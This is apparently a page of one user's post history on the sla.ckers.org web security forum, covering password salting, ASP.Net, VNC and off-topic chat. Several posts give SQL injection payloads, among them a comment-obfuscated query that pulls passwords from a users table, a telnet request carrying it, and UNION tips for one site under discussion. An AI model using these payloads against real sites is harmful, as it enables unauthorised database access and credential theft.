Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 51
6 years ago
kogir
It seems I'm late to the party here, but I wanted to try and contribute anyway. The only purpose salts serve is to force an attacker to brute force each password individually. Given enough time and effort, any password can be cracked. See http://sla.ckers.org/forum/read.php?15,19557#msg-20896 for a detailed writeup :)
Forum: CSRF and Session Info
6 years ago
kogir
I recommend this book: http://www.amazon.com/XSS-Exploits-Scripting-Attacks-Defense/dp/1597491543/
Forum: SQL and Code Injection
6 years ago
kogir
Gareth Heyes Wrote: ------------------------------------------------------- > @kogir > > How do you store per user salts? What happens when > a new user is created? If the salts are stored in > the database then I can see major problems with > this method. > > I fail to understand why I'm missing the point > please provide me with a link to a rainbow table &
Forum: Privacy
6 years ago
kogir
@Gareth Heyes You're missing the point. The goal of properly implemented salting is to make *creating* a rainbow table intractable. If I use sufficiently long and random *per user* salts, I can make it such that you have to start over and brute force each user's password by itself. None of the work done to crack user A's password can be reused to help crack user B's password. See exampl
Forum: Privacy
7 years ago
kogir
A lazy stored procedure developer would code things like this, which is safe: CREATE PROCEDURE . @Author varchar(100) AS BEGIN SELECT Title, Content, Date FROM Articles WHERE Author = @Author END If they know enough to bother using stored procedures, it's quite likely they'll code things the correct (and shorter) way, which is not injectable. The one place where you mig
Forum: SQL and Code Injection
7 years ago
kogir
@Ronald Correct me if I'm wrong, but I think the /**/ trick can only be used to take the place of spaces. S/**/ELECT 1; didn't work for me on either MS SQL or MySQL 5-ish. SELECT/**/1; worked though.
Forum: SQL and Code Injection
7 years ago
kogir
Although I wouldn't recommend it, there's also ASP.net AJAX http://ajax.asp.net/default.aspx?tabid=47
Forum: News and Links
7 years ago
kogir
You really needn't worry about this too much, unless you're using a debit rather than a credit card. With a credit card you usually have 90 days to contest transactions, and it's up to the merchant to prove the purchase was legitimate. With debit cards you have around 30 days, but you'll be missing the money until they sort it all out. (Both time limits based on cards I have, your may
Forum: Privacy
7 years ago
kogir
I posted this to his blog, but I thought I'd echo it here as well: ==== So, if you're doing this on the server side anyway, why download css and javascript separately from the HTML at all? Just include it in the page requested by the user. You can still keep separate css, js, and html (aspx/ashx) files and then either write a custom control that outputs the css+js into the html or exte
Forum: XSS Info
7 years ago
kogir
I hate them too. They get me at all my domains as well. I saw the fopen bug but couldn't think of anything to do with it. Might it be possible to add an init script or do something else sneaky using that hole? This really isn't my area of expertise.
Forum: OMG Ponies
7 years ago
kogir
christ1an Wrote: ------------------------------------------------------- > Uhm thats tricky kogir. Does that syntax really > work? Never seen it before :) I tested on MySQL 5-ish (not sure of exact version off hand) and SQL Server 2005. Also, mal is right on about virtual hosting. You'll likely need the host header.
Forum: SQL and Code Injection
7 years ago
kogir
I'd try comments /**/ and horizontal tabs before giving up. Also, Telnet is your friend :) *ttp://site.com/?',SELECT/**/password/**/FROM/**/users/**/WHERE/**/id=1/**/LIMIT/**/1)/* And for telnet: >telnet site.com 80 >GET /?',SELECT/**/password/**/FROM/**/users/**/WHERE/**/id=1/**/LIMIT/**/1)/* HTTP/1.0<newline> <newline> Where <newline> is replaced with presses
Forum: SQL and Code Injection
7 years ago
kogir
I'm pretty sure the implementations of VNC I've used (tightvnc, RealVNC free edition) send passwords in plain text (though they're compressed, so they're not human readable in ethereal). I always use VNC tunneled through ssh.
Forum: OMG Ponies
7 years ago
kogir
I don't use MySpace at all so I can't day for sure, but: __VIEWSTATE is the ASP.Net viewstate. It might be base64 encoded, but since MySpace uses ASP.Net 2.0, it's more likely encoded with the ObjectStateFormatter . Also, ASP.Net has a built in option to use an HMAC to verify the validity of the viewstate. If HMAC verification is enabled, you'll need to guess the private key the use.
Forum: CSRF and Session Info
7 years ago
kogir
jungsonn, In this case it's just a hunch I have. They might be using stored procedures. However, in order to produce that error the procedure would need to accept the AboutUsId as a (n)(var)char data type, append it to a string, and then execute the string. It's not impossible, but it sounds painful. Also, the "_sql" in "Localhost.Classes.get_records.getds(String _sql, Stri
Forum: SQL and Code Injection
7 years ago
kogir
Google Firefox Add & Edit Cookies Tamper Data Firebug Network Monitor 3 A proxy tool I'm working on XSS cheat sheet
Forum: News and Links
7 years ago
kogir
Actually, ====================== 1. They use stored procedures here. ====================== I actually doubt this is true. I work with .Net and MS SQL every day and this is not the kind of message you get when things go awry in a stored procedure. They're very likely just creating the query in code and executing it. Either way, they're running a query with your input in it. It doesn't
Forum: SQL and Code Injection
7 years ago
kogir
Sounds like either a cast failed (didn't get the data type it expected) or the query returned no results when some were expected. It's hard to tell with only that message. You might try starting with 59 to make sure at least one result gets returned.
Forum: SQL and Code Injection
7 years ago
kogir
Oh, there's also a way to use a join to almost ensure it will work, but I'll leave that up to you. Just think to yourself: "How to I return exactly the data it's expecting, but with some modifications of my choosing?" Hint: JOIN on AboutUs All of this of course assumes an incorrectly configured server where the account running the queries can read the sysobjects table.
Forum: SQL and Code Injection
7 years ago
kogir
hackathology Wrote: ------------------------------------------------------- > aID%20=%20'UNION%20ALL%20SELECT%20*%20FROM%20sysobjects%20WHERE%20xtype='U ------------------------------------------------------- So, in order for the union to work you need to match up the column data types and the number of columns. Try this: -1' UNION SELECT ABS(CAST(CAST(NEWID() as binary(4)) as int))
Forum: SQL and Code Injection
7 years ago
kogir
VS 6 won't work with Vista and likely never will http://msdn2.microsoft.com/en-us/vstudio/aa948854.aspx . May I recommend XP? If all you want is VB 6, that *is* supported http://msdn2.microsoft.com/en-us/vbrun/ms788708.aspx , but you might want to look into one of the newer Express offerings. For VB 6 you'll need SP6 http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1192228&SiteID=1
Forum: OMG Ponies
7 years ago
kogir
I find books to be invaluable for reference and for skimming to see what's possible. At work I use ASP.Net and C# and the framework is so extensive I'll never really know it all. However, some skimming of books has introduced me to many time saving constructs and has saved me from rolling my own solution at least two or three times.
Forum: OMG Ponies
7 years ago
kogir
I grew up in Arlington (near Dallas), and this kind of crap happened with every ice storm. There was never really snow on the road, only ice, and these people with 4x4 trucks thought they could drive on anything. I lived next to a huge hill and saw some of the stupidest (and funniest) stuff ever. My favorite was when a huge Dodge Ram *almost* made it up the hill only to stop and start slidi
Forum: OMG Ponies
7 years ago
kogir
One thing you forget is that users don't care about security until something bad happens to them. If you follow your own advice and try to offer something that users are willing to pay for, someone else will match your functionality, make the user experience better, and steal all your users. Good security is a balancing act. If your application is too secure (painful to use) or too insecu
Forum: XSS Info
7 years ago
kogir
There's an RFC about this: http://www.ietf.org/rfc/rfc3093.txt :) Anyway, I see two cases: 1) An attacker has owned a server. In this case all is lost; you're owned. 2) You implement some server that tunnels over . In this case, the firewall isn't bypassed, it's just moved. The server needs to support firewall features, or the hardware needs to be arranged such that: <-> <
Forum: Networking
7 years ago
kogir
I think your solution would work, but it's late and I might have missed something. However, wouldn't it be easier to add: <!-- Content-Disposition: attachment --> to the top of every page as per http://sla.ckers.org/forum/read.php?4,1975,2037#msg-4296 ? It seems to work for my site (or at least breaks *my* mhtml exploit code).
Forum: CSRF and Session Info
7 years ago
kogir
See this: http://msdn2.microsoft.com/en-us/library/ms179859.aspx You've found a valid injection point, and you can be pretty sure they're using MSSQL (SQLExec from vbscript). What do you want to test?
Forum: SQL and Code Injection
7 years ago
kogir
This test post was routed through the proxy. It may yet work.
Forum: Projects
7 years ago
kogir
Lately I've been listening to: Jamiroquai, keane, the kooks, blur, basement jaxx, BT, conjure one, delerium, enya, enigma, the postal service, the dandy warhols, muse, modest mouse, royksopp, madonna, dzihan and kamian, infected mushroom, etc. My tastes are fairly random. Edit: spelling correction
Forum: OMG Ponies
7 years ago
kogir
RSnake, I wasn't saying you should use C++, I was just saying it's not going away. In fact, if you do it in C# chances are very good that it will run under mono on *nix as well as on windows so more people could use it. I agree that Java is satan ;) So, if you stick with C++, I present Winsock2: http://msdn2.microsoft.com/en-us/library/ms738545.aspx If all you need is HTTP, then WinHTTP ma
Forum: Projects
Pages: 12Next
Current Page: 1 of 2